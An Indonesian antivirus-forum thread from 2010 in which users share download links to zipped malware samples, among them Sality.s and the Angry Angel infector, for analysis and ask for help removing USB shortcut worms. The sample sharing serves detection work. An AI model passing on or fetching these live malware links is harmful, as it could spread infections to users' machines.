Ditulis oleh: Ryan BeKaBe pada September 15, 2010, 01:16:39 PM
Virus datang.... :
http://www.ziddu.com/download/11675119/Setup-Virus.zip.html
http://www.ziddu.com/downloadlink/11669185/RandomName-Virus.zip
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 15, 2010, 01:42:37 PM
Virus datang.... :
http://www.ziddu.com/download/11675119/Setup-Virus.zip.html
http://www.ziddu.com/downloadlink/11669185/RandomName-Virus.zip

Pirus baru ya bro...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada September 15, 2010, 01:45:33 PM
Yoi, coba cek aja....
Coz SmadAV 8.2 blum detect.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada September 15, 2010, 03:09:07 PM
http://www.ziddu.com/download/11675119/Setup-Virus.zip.html = Sality.s
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 15, 2010, 03:16:35 PM
http://www.ziddu.com/download/11675119/Setup-Virus.zip.html = Sality.s
izin sedot semua sample virusnya sob, btw kalo bisa upload di 4shared.com, sendspace.com atau ke forum ini.
Di ziddu loading agak lama. :(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: padmoman pada September 17, 2010, 06:05:16 AM
bos, saya mau upload contoh virus tapi yang di hard disk external saya sudah berubah menjadi shortcut, jadi ga bisa di upload, nama virusnya kalo ga salah ada aplikasi yuterx.exe yang membuat semua jadi shortcut, mohon bimbingannya. terima kasih
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada September 17, 2010, 06:08:34 AM
Di zip aja dulu yuterx.Exe nya trus upload dEH, cmiiw
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 19, 2010, 12:14:10 PM
All

Kalau mau attachment virus,tolong dirarkan/zip

Untuk menghindari hal-hal yang tidak diinginkan.

Thanks
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Traydajer pada September 19, 2010, 12:32:12 PM
Sepertinya saya juga kena virus yang sama. namanya bauuzix
Sebelum nya komputer saya sudah terinfeksi dan akibatnya semua file menjadi shortcut, dan CPU usagenya menjadi 100%, setelah install smadav versi 8.2 virus berhasil terdeteksi dan dapat di clean tetapi file yang sebelumnya menjadi shortcut tetap tidak kelihatan, jika buka file lewat link address bisa terbuka dan ketika saya lihat propertiesnya file dalam keadaan hidden tetapi checkbox nya tidak dapat diclick.
Mohon bantuannya langkahnya untuk dapat menampilkan kembali file yang hidden bagaimana?.

thanks
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Kill All Viruses pada September 20, 2010, 04:59:00 AM
Maaf,qu gk bs bwa smplenya,, mungkn bsk2, ada yg pernah kena yg namanya , , , oleh avira dtksi sbg TR/Stuxnet.a saat dFD, tp ktka aktV,, tb2 guard/RTP hmpr smua aV import tdk bkerja, pdhal servicenya jalan, trus stlah itu, qu cb repair PCqu, qu full scan smua pke avira, nama malwarenya brubh jdi ada 3,,
1.TR/Stuxnet.m
2.TR/Stuxnet.a
3.RKIT/Stuxnet.a Rootkit
di FD bkn shortcut bnyak bgt namanya copy.ink , copy of.ink , , dn strsnya, ddtksi olh avira sbp EXPLOIT . . . Trs ada malware yg dFD bkin file Rar.exe dngan icon dry Skype... Thx, sX lg maaf, smplenya blm bs dkrim....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ghabily pada September 22, 2010, 10:22:42 PM
ada virus W32/almanahe.B,dia menghapus icon desktop
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 23, 2010, 11:35:42 AM
ada virus W32/almanahe.B,dia menghapus icon desktop

wow..mantaps kk
kira2 efek yg lain apa ya ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: nabil24 pada September 23, 2010, 02:30:13 PM
Bro,,lappie dan flash saya kena virus..kinerja virus tsb yaitu me"shortcut"semua file" saya lalu meng"hidden" file" saya,meskipun virusnya udah sya hapus tapi selalu muncul lagi,bagaimana cara mengatasinya??
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada September 23, 2010, 02:48:15 PM
Bro,,lappie dan flash saya kena virus..kinerja virus tsb yaitu me"shortcut"semua file" saya lalu meng"hidden" file" saya,meskipun virusnya udah sya hapus tapi selalu muncul lagi,bagaimana cara mengatasinya??
coba di scan pake = ESET, MSE, Dr.Web CureIt!® (http://www.freedrweb.com/cureit)

more info, coba masuk sini:
http://smadaver.com/konsultasi-virus/mengatasi-virus-flyff-666-dll-vbs/
http://jastisbago.blogspot.com/2010/01/mengenal-virus-flyff-666dllvbs.html

dan jangan lupa, segera patch OS, bisa diambil dari sini:
https://www.microsoft.com/technet/security/bulletin/ms10-046.mspx
https://www.microsoft.com/downloads/en/details.aspx?familyid=12361875-B453-45E8-852B-90F2727894FD&displaylang=en
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: qhank pada September 23, 2010, 03:12:53 PM
mohon di analisa
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hakagiri pada September 24, 2010, 10:04:45 AM
nih ada zeapot.exe, tp ane ga tau ni virus atw bukan, file size nya 568 KB.. tolong bantuannya  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 24, 2010, 10:16:24 AM
nih ada zeapot.exe, tp ane ga tau ni virus atw bukan, file size nya 568 KB.. tolong bantuannya  ^:)^

Ya itu kerjaan virusnya....
itu aja saran om Gugel.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: crewgamers pada September 24, 2010, 01:42:17 PM
agan-agan tolong bantu saya tentang masalah menghilangkan virus yg kedetec di salah satu antivirus import tp di smadav tak dikenali. ( win32.rounce.b )  ^:)^
 :( :( :( :( :( :(
Mohon bantuannya.....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada September 24, 2010, 02:02:27 PM
agan-agan tolong bantu saya tentang masalah menghilangkan virus yg kedetec di salah satu antivirus import tp di smadav tak dikenali. ( win32.rounce.b )  ^:)^
 :( :( :( :( :( :(
Mohon bantuannya.....

Bisa diUpload Virusnya, nanti tak bedah.. :P :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada September 24, 2010, 02:48:57 PM
@up up emang av impor apa yg gk dETek,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: joecool87 pada September 25, 2010, 08:28:09 PM
wah,ane pengen jadi anggota virus searcher ni..gmn carax???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada September 26, 2010, 10:19:38 AM
agan-agan tolong bantu saya tentang masalah menghilangkan virus yg kedetec di salah satu antivirus import tp di smadav tak dikenali. ( win32.rounce.b )  ^:)^
 :( :( :( :( :( :(
Mohon bantuannya.....
Scan pakai Kaspersky 2011, di komputer aku semua file .exe berhasil di disinfected dengan baik....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 27, 2010, 09:45:33 AM
agan-agan tolong bantu saya tentang masalah menghilangkan virus yg kedetec di salah satu antivirus import tp di smadav tak dikenali. ( win32.rounce.b )  ^:)^
 :( :( :( :( :( :(
Mohon bantuannya.....

Bisa diUpload Virusnya, nanti tak bedah.. :P :P

sudah berkali-kali aq upload sampelnya, tapi belum di masukkan2.  coba chek sampelnya di Thread ini... varian lainnya jg sudah q upload disini.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 10:37:53 AM
ada yang bisa apusin virus LIEPUU g?
ud discan pake ansav, smadav, n bitdefender,, g nyangkut nih virus ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada September 27, 2010, 10:45:25 AM
ada yang bisa apusin virus LIEPUU g?
ud discan pake ansav, smadav, n bitdefender,, g nyangkut nih virus ???

coba norman malware cleaner atau malwarebytes antimalware  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 10:47:59 AM
ok tak coba dulu deh,, tengkyu ya mas :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada September 27, 2010, 10:58:31 AM
ada yang bisa apusin virus LIEPUU g?
ud discan pake ansav, smadav, n bitdefender,, g nyangkut nih virus ???
tes pake AV laen lah :D
misalkan MSE NORTON atw AVAST  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada September 27, 2010, 11:50:39 AM
ada yang bisa apusin virus LIEPUU g?
ud discan pake ansav, smadav, n bitdefender,, g nyangkut nih virus ???
dah coba pake PrevX blm bro...
download prevx (http://info.prevx.com/downloadcsi.asp)
more info : klik di sini (http://www.prevx.com/filenames/25627826331669866-X1/LIEPUU.EXE.html)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MadeOke pada September 27, 2010, 12:16:34 PM
Ini virus SVCHOST ?! tolong diteliti...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 03:53:06 PM
kaya gimana ya? saya juga bingung,ud diinstala pake perfx itu juga ga mempan :o
trus dibuat short cut semua sama dia,,weleh,,weleh,, diumpetin isinya
ini ta upload contohnya

untuk C:\Documents and Settings diumpetin juga,, ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 03:54:37 PM
klo norton g mau ah,, ngeden komputernya hehhe :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 04:10:40 PM
di cabut langsung g mau ni virus,,
jd tak zip aja,, tolong sembuhin ya, mas2 yg jago :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada September 27, 2010, 04:17:03 PM
di cabut langsung g mau ni virus,,
jd tak zip aja,, tolong sembuhin ya, mas2 yg jago :-bd
Wah bahaya nih  ;D
RunOuce ya?
Sama donk  :P
Bersihin pakai Kaspersky aja :D
www.kaspersky.com

Ini hasil diteksi nya Kaspersky
(http://i54.tinypic.com/2h2jguu.jpg)
Biar kutebak efeknya
Isi FD di hidden,trus banyak sort cut
Trus ada file alg.exe(hiden) di
C:\Documen~/user\

Trus banyak file readme.eml dimana mana

Trus ntar lama lama komputer rusak  :'(


Saran ku cepat di scan



Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 04:25:54 PM
ta tambahin deh
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada September 27, 2010, 04:28:51 PM
@Up
 Liat atas ada yang aku tambah :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 04:30:49 PM
wah nakut2in nih,, btw, bayar ga? ada demonya gratisan berapa hari gitu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada September 27, 2010, 04:33:02 PM
wah nakut2in nih,, btw, bayar ga? ada demonya gratisan berapa hari gitu
Ada trial 30 hari bisa di gunain full 30 hari

BTW Ms.office mu bisa di buka gak?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 04:36:41 PM
untung bisa,, ooh ada trial ya,, yowis,, ta coba dulu deh mas,tengkyu ya ceritanya ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada September 27, 2010, 04:45:22 PM
untung bisa,, ooh ada trial ya,, yowis,, ta coba dulu deh mas,tengkyu ya ceritanya ^:)^
Yupt
Masama

Komputer kamu Online kan?

Owh iya entar rusak nya windows nya gak bisa log in
Abis log in langsung log off sendiri

Aku salah pilih AV jadi gitu :'(

Rusak deh komputer guru :D

Untung di rumah aku pakai kaspersky :D
Selamat ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 04:56:45 PM
iya, td kan nyari key perfx 3.0,, eh malah dapet virus baru,, kayanya dia yg buat deh,, namanya hampir sama gt,, mudah2an jgn kena windowsnya, males installnya,, hehhe :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada September 27, 2010, 05:05:47 PM
NgoMoNGin virus shorcuT ya? Td aku colokin FD kwan ke lapy, eh keDetek bnyak bgt virus di FD tsb, semua isi FD berubah jadi shorcut, untung ada ESS yg menghapus semua virusnya, trus untk mengembalikan data yg ke hidden aku pake smadav, jd saran gw pake aja smadav sama ESS,,( lakukan scan manual FD dgn smadav jgn andalkan scan otomatisnya)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada September 27, 2010, 05:09:01 PM
NgoMoNGin virus shorcuT ya? Td aku colokin FD kwan ke lapy, eh keDetek bnyak bgt virus di FD tsb, semua isi FD berubah jadi shorcut, untung ada ESS yg menghapus semua virusnya, trus untk mengembalikan data yg ke hidden aku pake smadav, jd saran gw pake aja smadav sama ESS,,( lakukan scan manual FD dgn smadav jgn andalkan scan otomatisnya)
Itulah penyebab smadav di benci di sekolah ku :D Gak detek virus ini

Iya ESet bisa hapus virus di FD
Tapi kalu udah terlanjur terinfeksi,Malah merusak file file .exe ...
ESET yang merusak komputer guruku :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada September 27, 2010, 05:24:48 PM
di cabut langsung g mau ni virus,,
jd tak zip aja,, tolong sembuhin ya, mas2 yg jago :-bd

ta tambahin deh

pake NIS2011 dan ESS4 uda bisa ditek...(definitions hari ini)
NIS2011 = W32.Changeup.C
ESS4 = Win32/AutoRun.VB.RT worm
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MadeOke pada September 27, 2010, 05:26:37 PM
yang virus svchost yang tak upload dah di coba lum agan-agan ???  ??? ??? ???

http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/msg123424/#msg123424 (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/msg123424/#msg123424)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada September 27, 2010, 05:30:49 PM
yang virus svchost yang tak upload dah di coba lum agan-agan ???  ??? ??? ???

http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/msg123424/#msg123424 (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/msg123424/#msg123424)
gak terditeksi virus ma KIS 2011 ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada September 27, 2010, 05:39:07 PM
Ini virus SVCHOST ?! tolong diteliti...
uda ane scan pake NIS2011 dan ESS4 = tdk ditek...

btw, td ane scan via virustotal.com...dan hasilnya bisa diliat di sini (http://www.virustotal.com/file-scan/report.html?id=83b2419321ed417ecf2d348baa6d3fded1774bac7a89d44ffc0d9a8da3d742bf-1285583740)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MadeOke pada September 27, 2010, 05:43:45 PM
Aduhhhhh... virus apaan sih ni..
aku pake Avira ama bitfefender yang dah update koq ga detect ya???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 27, 2010, 05:56:38 PM
Aduhhhhh... virus apaan sih ni..
aku pake Avira ama bitfefender yang dah update koq ga detect ya???
bisa upload kemari sample virusnya yang anda maksud. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 06:18:04 PM
NIS2011 dan ESS4
kepanjangannya apaan tuh?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada September 27, 2010, 06:20:12 PM
NIS2011 dan ESS4
kepanjangannya apaan tuh?
NIS2011 = Norton Internet Security 2011 (http://www.symantec.com/index.jsp)
ESS4 = ESET Smart Security 4 (http://www.eset.com)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 27, 2010, 06:25:53 PM
gratis ga? :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada September 27, 2010, 06:27:39 PM
klo yg gratis coba avast, avira, ato MSE.. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada September 28, 2010, 02:25:59 AM
Ini virus SVCHOST ?! tolong diteliti...
detek by super antispyware pro update gratis selamanya(http://www.indowebster.web.id/images/smilies/grin4.png)
(http://farm5.static.flickr.com/4112/5030262827_75e44a7587_z.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 28, 2010, 06:53:36 AM
wah ternyata bisa ke apus pake Microsoft Security Essentials,, sakti juga ni antivirus,, gratis lagi :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada September 29, 2010, 02:24:18 PM
Oh Ternyata Disini Toh.. Buat Isi2 Virus Wkwkwkw.... Baru Tau Gue  ;D ;D ;D
Parah !
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MadeOke pada September 29, 2010, 02:27:14 PM
di totalvirus "yang svchost" itu kedetect ama avira dan bitdefender..
tapi koq aku ga kedetect ama avira ataw bitdefender ku ya??
(dah update loh) ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada September 29, 2010, 07:00:38 PM
di totalvirus "yang svchost" itu kedetect ama avira dan bitdefender..
tapi koq aku ga kedetect ama avira ataw bitdefender ku ya??
(dah update loh) ???
pakai super antispyware sudah gw test terdeteksi  virus svchostnya    :D
http://www.softpedia.com/get/Internet/Popup-Ad-Spyware-Blockers/SUPERAntiSpyware.shtml
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada September 30, 2010, 06:17:30 AM
di totalvirus "yang svchost" itu kedetect ama avira dan bitdefender..
tapi koq aku ga kedetect ama avira ataw bitdefender ku ya??
(dah update loh) ???
pakai super antispyware sudah gw test terdeteksi  virus svchostnya    :D
http://www.softpedia.com/get/Internet/Popup-Ad-Spyware-Blockers/SUPERAntiSpyware.shtml

ta gabung semuanya aja Microsoft Security Essentials + super antispyware,, eh tambah banyak yg kedetek,, mudah2an g berat aja ni komputer,, hehehe :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MadeOke pada Oktober 01, 2010, 11:06:05 AM
udah scan pake Super AntiSpyware koq ga ke detect???
(core:5608 trace:3420)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 01, 2010, 12:16:31 PM
http://www.ziddu.com/download/11899282/Rev.8.1.exe-AngryAngelv3.zip.html (http://www.ziddu.com/download/11899282/Rev.8.1.exe-AngryAngelv3.zip.html)
Angry Angel Infector.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MadeOke pada Oktober 03, 2010, 04:20:34 PM
Koq ga ada yang jawab??
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 03, 2010, 06:48:34 PM
Koq ga ada yang jawab??
pakai Morphost AV sudah kedetek. silahkan coba..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: remonjaja pada Oktober 03, 2010, 10:31:19 PM
 ;D macam mana ntuk membasmi virus seperti nie ...?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Deny MiniDwarf pada Oktober 04, 2010, 08:11:05 PM
;D macam mana ntuk membasmi virus seperti nie ...?

virus nya mana nih? ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: gg pada Oktober 05, 2010, 12:42:47 PM
halo...
mohon dibantu dong... sudah pake smadav 8.2 tidak bisa hilang...  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Oktober 05, 2010, 01:13:17 PM
halo...
mohon dibantu dong... sudah pake smadav 8.2 tidak bisa hilang...  ^:)^

smadav 8.2 belum bisa mendeteknya sob karna belum di update. bisa coba Morphost 8, sudah bisa mengenalinya sebagai virus Random Shortcut...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: gg pada Oktober 05, 2010, 01:34:22 PM


smadav 8.2 belum bisa mendeteknya sob karna belum di update. bisa coba Morphost 8, sudah bisa mengenalinya sebagai virus Random Shortcut...
[/quote]


sudah pake morphost 8, tapi waktu klik perintah tuntaskan, keluar kotak dialog kl virus tidak bisa dituntaskan, dikandangkan, maupun dihapus...

mohon bantuannya dong....
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Oktober 05, 2010, 01:38:40 PM
Tu virus AntiKill, dia menggunakan bantuan dari "zzz.dll" yg mana dibuat menggunakan Power Basic, bisa dibersihkan manual kok, gampang saja. ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada Oktober 07, 2010, 02:14:02 AM
@ Zai

Titipan Kilat......... :)

Masih belum kedetek
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: billoebis pada Oktober 07, 2010, 01:19:01 PM
mhn pencerahannya...file ektension *.sucks...sdh SETAHUN lebih...dgn mencoba McAfee, Norton, Smadav, PCMAV dan INDOVIR tidak terbaca dan hanya bisa didelete manual dan tidak bisa di search...polanya membuat file baru dengan nama folder tempat nama file berada dgn ektensionnya *.sucks yang besarnya hanya 0 KB, tp bila di zip menjadi 1 KB...sehingga di tiap folder berisi file "nama foldernya.sucks"...diperhatikan menghapus file-file yang lama secara perlahan...after before tq...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Oktober 07, 2010, 11:18:03 PM
kira2 kenapa program ini dicurigai smadav??
pdhal cuman VB buat generate text doank..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cipuci86 pada Oktober 11, 2010, 12:09:54 PM
antivirus buat ngapus virut.nb
oia, ko setiap masukin flasdis ada peringatan disebelah kanan ya? trus pilihannya ada explorenya? itu smadavnya ud kena virus belum ya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jangkung23 pada Oktober 17, 2010, 05:20:09 PM
ini ke detect virus tapi ga bisa diclean n dihapus
tolong ya gan ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: zipexs pada Oktober 18, 2010, 07:05:43 AM
alo all.....lamkenal buat semua ya....
newbie mau nanya ne....pc ku smakin lama dipakai tmbh lemot aaaabiz pdhl bru 5 mnt makainya...
pc ku kena virus NEW HEUR (level9) trs mncul file lxlu.pif , cnsf.pif , ssehv.pif trs autorun.inf di drive C , D, E ke detek virus oleh smadav.....gimana caranya membasminya/?
Newbie mohon pencerahannya...trim's
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Oktober 18, 2010, 07:13:43 AM
ini ke detect virus tapi ga bisa diclean n dihapus
tolong ya gan ^:)^

bersih tuh bro filenya,
aku buka g ada masalah, isinya kyk gini
# Copyright (c) 1993-2001 Microsoft Corp.
#
# This file has been automatically generated for use by Microsoft Internet
# Connection Sharing. It contains the mappings of IP addresses to host names
# for the home network. Please do not make changes to the HOSTS.ICS file.
# Any changes may result in a loss of connectivity between machines on the
# local network.
#

192.168.0.1 smi-0e463922d78.mshome.net # 2015 10 5 16 9 1 45 765

bukan virus tuh  :)

alo all.....lamkenal buat semua ya....
newbie mau nanya ne....pc ku smakin lama dipakai tmbh lemot aaaabiz pdhl bru 5 mnt makainya...
pc ku kena virus NEW HEUR (level9) trs mncul file lxlu.pif , cnsf.pif , ssehv.pif trs autorun.inf di drive C , D, E ke detek virus oleh smadav.....gimana caranya membasminya/?
Newbie mohon pencerahannya...trim's

pake AV luar aja bro klo SMADAV g bisa ngatasi
Kaspersky, AVG, ESET, atau apalah
klo pengen tool gratis tapi ampuh aku saranin pake Norman_Malware_Cleaner (http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe)  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: azsgetoo pada Oktober 20, 2010, 09:45:41 AM
to the point ja ya ni gan w lagi bingung banget ni gan komputer d rumah w kenapa ya program nya tuh ga bisa di pake setiap abis di restart kenapa ya???
w klik ga da respon..
trus program nya juga ga bisa di add remove,,
tapi w coba masuk save mode bisa w buka,,, duhh apa ya solusinya bantu donk please,,
di bantu ya
 ~x( ~x( ~x( ~x( :'( :'( :'( :'( :'(

di w ulod juga file yang aneh yang tiba2 muncul
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 23, 2010, 10:06:41 AM
@atas

tuh file biasa,gk ada pengaruhnya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: fosgate4 pada Oktober 26, 2010, 08:57:21 AM
ni pak saya upload..
tolong di analisa ya..
ini virus anakannya...
bikin task manager dan registry disable...
 ;D :-bd :-X <=) :x

Trims
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Oktober 26, 2010, 09:02:47 AM
ni pak saya upload..
tolong di analisa ya..
ini virus anakannya...
bikin task manager dan registry disable...
 ;D :-bd :-X <=) :x

Trims
sudah bisa dideteksi sama ESS4 bro...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: surya atmaja pada Oktober 26, 2010, 09:18:42 AM
tlong dong pc ku kena new neur level(9) dan autorun inf,semadav bisa hapus new heur  tapi biang nya autorun.inf gak bisa dihapus,maka virus tsb bolak balik, pliz bantuannya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: asuyanto pada Oktober 26, 2010, 04:21:10 PM
Bro...ini kedetek oleh smadav 8.3 sbg new heur.vb(149)+ALMAN. tipe apakah virus ini?.... gimana cara ngilangin nya?....~x(

thanks 
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ret pada Oktober 27, 2010, 05:13:45 PM
Mas ko sya mau upload virus baru yang tidak terdetect smadav rev 8.3 muncul error ini -> ERROR: Failed to find flength file
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Oktober 27, 2010, 05:22:44 PM
Mas ko sya mau upload virus baru yang tidak terdetect smadav rev 8.3 muncul error ini -> ERROR: Failed to find flength file
coba di zip/rar dulu bro...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ret pada Oktober 27, 2010, 05:29:21 PM
sudah mas, sudah saya coba pakai zip dan rar mucnul error itu trus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Oktober 27, 2010, 05:36:14 PM
sudah mas, sudah saya coba pakai zip dan rar mucnul error itu trus
itu di upload nya ke mana bro...(smadav.net kah...?)
klo di upload kemari bisa ga...(attachment)

klo ga, bisa diupload ke www.mediafire.com, trus ntar link nya di posting di sini ajah...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ret pada Oktober 27, 2010, 05:39:23 PM
Iya mas ke smadav.net muncul error itu. tapi saya sudah upload ke mediafire juga, ini linknya : http://www.mediafire.com/?jvnlnde7nfdjmgk
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: s4nji pada Oktober 27, 2010, 05:43:55 PM
Bro...ini kedetek oleh smadav 8.3 sbg new heur.vb(149)+ALMAN. tipe apakah virus ini?.... gimana cara ngilangin nya?....~x(

thanks 

Terinjeksi virus alman
Silahkan cari cleanernha, udah banyak kok :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Oktober 27, 2010, 06:06:33 PM
Iya mas ke smadav.net muncul error itu. tapi saya sudah upload ke mediafire juga, ini linknya : http://www.mediafire.com/?jvnlnde7nfdjmgk
beberapa AV luar sudah bisa mendeteksinya bro...
liat screenshotnya dibawah ini...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MrBeather pada Oktober 27, 2010, 06:34:14 PM
gan nie tolong di analisis nie virus
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Oktober 27, 2010, 06:39:25 PM
gan nie tolong di analisis nie virus
detected by ESS4 as Kryptik.HSH Trojan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ret pada Oktober 27, 2010, 09:12:15 PM
Iya mas tp smadav belum deteksi nih virus, soalnya klo antivirus luar kan mencegah tp ga bisa menyembuhkan klo virusnya nya sudah masuk ke system32 dan registry dan virus itu kalaupun sudah dihapus by antivirus or dihapus manual lwt registry dia muncul2 terus, yg ingin saya tnykan ada yg bisa hilangin sampai bersih dan ga nongol2 lagi ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Oktober 28, 2010, 11:49:48 AM
Iya mas tp smadav belum deteksi nih virus, soalnya klo antivirus luar kan mencegah tp ga bisa menyembuhkan klo virusnya nya sudah masuk ke system32 dan registry dan virus itu kalaupun sudah dihapus by antivirus or dihapus manual lwt registry dia muncul2 terus, yg ingin saya tnykan ada yg bisa hilangin sampai bersih dan ga nongol2 lagi ?

Smadav masih fokus pada virus lokal :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ydded pada Oktober 28, 2010, 12:10:19 PM
(http://img89.imageshack.us/img89/236/gambarlayar.png) (http://img89.imageshack.us/i/gambarlayar.png/)


ini cara ilanginnya gimana.... SOS...  ~x( ~x( :'( :'( :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Oktober 28, 2010, 08:48:33 PM
(http://img89.imageshack.us/img89/236/gambarlayar.png) (http://img89.imageshack.us/i/gambarlayar.png/)


ini cara ilanginnya gimana.... SOS...  ~x( ~x( :'( :'( :'( :'(
tuh dari UBUNTU ya ???
btw gw tadi juga di Flasdisc teman koq jadi keq gitu ya ???
